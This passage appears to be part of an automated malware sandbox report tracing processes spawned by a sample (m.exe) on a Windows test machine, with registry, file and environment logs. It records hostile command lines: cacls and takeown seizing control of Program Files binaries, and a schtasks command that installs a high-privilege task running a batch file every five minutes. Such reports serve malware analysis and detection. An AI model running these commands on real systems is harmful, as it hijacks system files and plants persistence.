| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0xe04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x10a8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "BrowserCore.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "BrowserCore.exe.mui" |
|
1 |
Process #143: wmiadap.exe
0
0
| Information | Value |
|---|---|
| ID | #143 |
| File Name | c:\windows\system32\wbem\wmiadap.exe |
| Command Line | wmiadap.exe /F /T /R |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:03:25, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x136c |
| Parent PID | 0x3c0 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege, SeDelegateSessionUserImpersonatePrivilege |
| Thread IDs |
0x
133C
0x
D30
0x
13B8
0x
10D8
0x
10F0
0x
1130
|
Process #145: cmd.exe
262
0
| Information | Value |
|---|---|
| ID | #145 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Mail\wabmig.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:29, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x13c4 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13AC
0x
1354
|
Host Behavior
File (190)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
25 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
90 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 62 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 47 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x1330, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x490, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "wabmig.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "wabmig.exe" |
|
1 |
Process #146: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #146 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\rempl\does.exe" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:30, Reason: Child Process |
| Unmonitor | End Time: 00:03:40, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1398 |
| Parent PID | 0xe60 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
60
0x
10E8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #148: schtasks.exe
942
0
| Information | Value |
|---|---|
| ID | #148 |
| File Name | c:\windows\syswow64\schtasks.exe |
| Command Line | schtasks /Create /tn DSHCA /tr "C:\Users\FD1HVy\AppData\Roaming\V1nQ8f0P.bat" /sc minute /mo 5 /RL HIGHEST /F |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:31, Reason: Child Process |
| Unmonitor | End Time: 00:03:51, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x121c |
| Parent PID | 0x1390 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1240
0x
11C0
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| schtasks.exe | 0x01300000 | 0x01330FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
COM (8)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2019-04-17T12:42:00 |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\schtasks.exe | base_address = 0x1300000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\schtasks.exe, file_name_orig = C:\WINDOWS\SysWOW64\schtasks.exe, size = 260 |
|
2 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Local Time, time = 2019-04-17 12:42:02 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2019-04-17 12:42:06 (Local Time) |
|
1 |
Process #149: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #149 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:35, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11b0 |
| Parent PID | 0xd64 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1198
0x
CE8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #150: cmd.exe
230
0
| Information | Value |
|---|---|
| ID | #150 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\UNP\convertible-suicide-construction.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:35, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:50 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1334 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1308
0x
13F0
|
Host Behavior
File (160)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
20 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
76 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
8 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 43 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x1380, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x120c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (41)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
4 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "convertible-suicide-construction.exe" |
|
1 |
Process #152: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #152 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:36, Reason: Child Process |
| Unmonitor | End Time: 00:03:46, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11a0 |
| Parent PID | 0x1124 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1324
0x
E10
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #153: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #153 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:36, Reason: Child Process |
| Unmonitor | End Time: 00:03:46, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xef8 |
| Parent PID | 0x10cc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1350
0x
FF8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #154: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #154 |
